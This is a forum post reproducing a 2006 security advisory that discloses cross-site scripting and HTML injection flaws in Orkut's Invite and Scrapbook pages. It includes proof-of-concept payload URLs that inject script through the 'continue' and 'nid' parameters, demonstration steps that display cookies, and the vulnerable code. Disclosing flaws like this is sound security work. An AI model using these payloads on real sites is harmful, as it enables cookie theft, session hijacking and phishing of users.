Orkut Multiple Cross Site Scripting Vulnerabilities
Results 1 to 1 of 1

Thread: Orkut Multiple Cross Site Scripting Vulnerabilities

  1. #1
    Junior Member
    Join Date
    Dec 2006
    Posts
    2

    Orkut Multiple Cross Site Scripting Vulnerabilities

    Orkut Multiple Cross Site Scripting Vulnerabilities



    #####################################################################

    XDisclose Advisory : XD100092
    Vulnerability Discovered: November 18th 2006
    Advisory Released : December 08th 2006
    Credit : Rajesh Sethumadhavan

    Class : Cross Site Scripting
    HTML Injection
    Severity : Medium
    Solution Status : Unpatched
    Vendor : Google Inc
    Vendor Website : http://www.orkut.com
    Affected applications : Orkut Services
    Affected Platform : All

    #####################################################################


    Overview:
    Orkut is an Internet social network service run by Google and named
    after its creator, Orkut Büyükkökten. It claims to be designed to
    help users meet new friends and maintain existing relationships with
    pictures and messages, and establish new ones by reaching out to
    people you've never met before.



    Orkut service is vulnerable to Cross-Site Scripting and HTML
    Injection. This is caused due to improper validation of user-supplied
    inputs.


    Description:
    A remote attacker can craft a GET request with the XSS payload as
    demonstrated below. When the victim clicks on the GET request the
    payload will get executed which result in stealing of cookie, IP info,
    refer info, browser information, clipboard content, operating system
    info, hardware Info, modification of page or html injection, url
    redirection, port scanning of the network, and even phishing is
    possible.

    1)Orkut Invite XSS:

    The flaws are due to improper sanitization of inputs passed to
    'continue' parameter in GET request
    -------------------------------------------------------------------
    http://www.orkut.com/Invite.aspx?con...cument.cookie)
    ------------------------------------------------------------------

    Demonstration:
    Note: Demonstration leads to your personal information disclosure

    - Login to your orkut account
    - Paste the above URL
    - Click on BACK button
    - Orkut Cookies will get displayed

    The similar way HTML injection is also possible.

    Vulnerable Code:
    ------------------------------------------------------------------

    <td valign="top">
    <table class="btn" border="0" cellpadding="0" cellspacing="0"
    onmouseover="this.className='btnHover'" onmouseout="this.className
    ='btn'">
    <tr style="cursor: pointer;" onclick="window.location='javascript:
    alert(document.cookie)';" id="b0">
    <td><img src="http://images3.orkut.com/img/bl.gif" alt="" /></td>
    <td nowrap style="background: url
    (http://images3.orkut.com/img/bm.gif)">back
    </td>

    ------------------------------------------------------------------

    2)Orkut Next page XSS:

    The flaws are due to improper sanitization of inputs passed to 'nid'
    parameter in GET request. This vulnerability is already fixed 2 days
    before
    Get Request with XSS payload:
    ------------------------------------------------------------------
    http://www.orkut.com/Scrapbook.aspx?...02785&pageSize
    =&na=3&nst=-2&nid=13550271097807907792-%22};%20alert('Xdisclose');%
    20function%20tt(){//
    ------------------------------------------------------------------

    Vulnerable Code:
    ------------------------------------------------------------------

    function changePageSize(value) {
    window.location="/Scrapbook.aspx?uid=3595989687719502785&na=
    1&nst=1&nid=13550271097807907792-"}; alert('Xdisclose');
    function tt(){//&pageSize="+value;
    }

    ------------------------------------------------------------------


    Solution:
    Orkut can improve their filters by disallowing certain characters
    like " <>/\?&`~!@#$%^*()[]|;:"' " in user input URL.


    Screenshot:
    http://www.xdisclose.com/Images/xdorkutinvitexss.jpg


    Impact:
    Successful exploitation allows execution of arbitrary script code in
    a user’s browser session in context of an affected site which result
    in stealing of cookie, IP info, refer info, browser information,
    clipboard content, operating system info, Referer info, hardware Info,
    modification of page or html injection (temporary webpage defacement),
    modification of page title, hijacking page flow, url redirection, port
    scanning of the victim’s network, and even phishing is possible.

    Impact of the vulnerability is network level.


    Original Advisory:
    http://www.xdisclose.com/XD100092.txt


    Credits:
    Rajesh Sethumadhavan has been credited with the discovery of this
    vulnerability


    Disclaimer:
    This entire document is strictly for educational, testing and
    demonstrating purpose only. Modification use and/or publishing this
    information is entirely on your own risk. The exploit code is to be
    used on your own orkut account. I am not liable for any direct or
    indirect damages caused as a result of using the information or
    demonstrations provided in any part of this advisory.
    Last edited by xdisclose; December 8th, 2006 at 07:42 PM.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •